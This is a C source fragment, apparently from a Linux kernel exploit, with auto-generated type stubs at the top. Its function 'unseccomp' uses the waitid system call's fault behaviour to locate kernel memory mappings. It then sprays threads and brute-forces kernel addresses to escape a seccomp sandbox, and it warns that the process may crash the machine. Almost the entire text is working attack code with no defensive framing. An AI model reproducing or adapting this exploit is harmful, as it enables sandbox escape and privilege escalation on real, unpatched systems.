
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int FUTEX_WAKE ;
 int INT_MAX ;
 int NUM_THREAD_SPRAY ;
 int P_ALL ;
 int SYS_waitid ;
 int WEXITED ;
 int barrier1 ;
 int barrier2 ;
 int errno ;
 scalar_t__ found_one ;
 int futex (int*,int ,int ,int *,int *,int ) ;
 unsigned long g_addr_guess ;
 int * g_threads ;
 unsigned long mapping_begin ;
 unsigned long mapping_end ;
 int num_threads ;
 int printf (char*,...) ;
 scalar_t__ pthread_create (int *,int *,int ,int *) ;
 int pthread_join (int ,int *) ;
 int sleep (int) ;
 unsigned long spray_offset ;
 int syscall (int ,int ,int ,unsigned long,int ,int *) ;
 int thread_attr ;
 int thread_guy ;
 int threads_run ;
 int usleep (int) ;

void unseccomp() {



  int i;

  unsigned long curr_guess = 0xffff800000000000;
  int j;
  while(1) {

    int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, ((void*)0));
    if (errno != 14) {
      mapping_begin = curr_guess;
      printf("found mapping at %p\n", (void*)curr_guess);
      break;
    }
    curr_guess += 0x10000000;
  }

  while(1) {
    curr_guess += 0x10000000;

    int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, ((void*)0));
    if (errno == 14) {
      printf("found mapping end at %p\n", (void*)curr_guess);
      mapping_end = curr_guess;
      curr_guess -= 0x10000000;
      break;
    }
  }



  barrier1 = 0;
  barrier2 = 0;
  for (i = 0; i < NUM_THREAD_SPRAY; i++) {
    num_threads = i;
    if(pthread_create(&g_threads[i], &thread_attr, thread_guy, ((void*)0))) {
      printf("pthread create error\n");
      printf("%d\n", i);
      break;
    }
  }
  printf("%d threads created\n", num_threads);


  unsigned long last_mapping_start;
  unsigned long last_mapping_end;

  unsigned long second_mapping;
  unsigned long second_mapping_end;
  usleep(100000);
  while(1) {
    curr_guess += 0x10000000;

    int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, ((void*)0));
    if (errno != 14) {
      printf("found second mapping at %p\n", (void*)curr_guess);

      second_mapping = curr_guess;
      last_mapping_start = second_mapping;
      curr_guess -= 0x10000000;
      break;
    }
  }
  while(1) {
    curr_guess += 0x10000000;

    int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, ((void*)0));
    if (errno == 14) {
      printf("found second mapping end at %p\n", (void*)curr_guess);
      second_mapping_end = curr_guess;
      last_mapping_end = second_mapping_end;
      curr_guess -= 0x10000000;
      break;
    }
  }


  unsigned long third_mapping = 0;
  unsigned long third_mapping_end;
  usleep(100000);
  while(curr_guess < second_mapping_end+0x100000000) {
    curr_guess += 0x10000000;

    int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, ((void*)0));
    if (errno != 14) {
      printf("found third mapping at %p\n", (void*)curr_guess);
      third_mapping = curr_guess;
      last_mapping_start = third_mapping;
      curr_guess -= 0x10000000;
      break;
    }
  }
  if (third_mapping) {
    while(1) {
      curr_guess += 0x10000000;

      int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, ((void*)0));
      if (errno == 14) {
        printf("found third mapping end at %p\n", (void*)curr_guess);
        third_mapping_end = curr_guess;
        last_mapping_end = third_mapping_end;
        curr_guess -= 0x10000000;
        break;
      }
    }
  }




  curr_guess = last_mapping_end-0x100000000;
  printf("last_mapping is 0x%lx bytes\n", last_mapping_end-last_mapping_start);
  printf("min guess %lx\n", curr_guess);
  printf("starting guessing\n");
  printf("this part can take up to a minute, or crash the machine :)\n");
  i = 0;
  while(!found_one) {
    curr_guess += 0x800000;
    unsigned long guess_val = curr_guess + spray_offset;

    syscall(SYS_waitid, P_ALL, 0, guess_val-26, WEXITED, ((void*)0));
    g_addr_guess = guess_val;

    barrier2 = 0;
    threads_run = 0;
    barrier1 = 1;
    futex(&barrier1, FUTEX_WAKE, INT_MAX, ((void*)0), ((void*)0), 0);
    while(threads_run < num_threads) {
      if (found_one) {


        barrier1=1;
        barrier2=1;
        futex(&barrier1, FUTEX_WAKE, INT_MAX, ((void*)0), ((void*)0), 0);
        futex(&barrier2, FUTEX_WAKE, INT_MAX, ((void*)0), ((void*)0), 0);
        printf("joining threads\n");
        for(i = 0; i < num_threads; i++) {
          pthread_join(g_threads[i], ((void*)0));
        }
        printf("done joining threads\n");

        sleep(1000);
      }
      usleep(10000);
    }


    barrier2 = 1;
    barrier1 = 0;
    futex(&barrier2, FUTEX_WAKE, INT_MAX, ((void*)0), ((void*)0), 0);
    while(threads_run < num_threads*2) {
      if (found_one) {
        printf("apparently we found one sleep forever\n");

        barrier1=1;
        barrier2=1;
        futex(&barrier1, FUTEX_WAKE, INT_MAX, ((void*)0), ((void*)0), 0);
        futex(&barrier2, FUTEX_WAKE, INT_MAX, ((void*)0), ((void*)0), 0);
        printf("joining threads\n");
        for(i = 0; i < num_threads; i++) {
          pthread_join(g_threads[i], ((void*)0));
        }
        printf("done joining threads\n");
        sleep(100000);
      }
      usleep(10000);
    }
    threads_run = 0;
    barrier2 = 0;
    i += 1;
  }
}
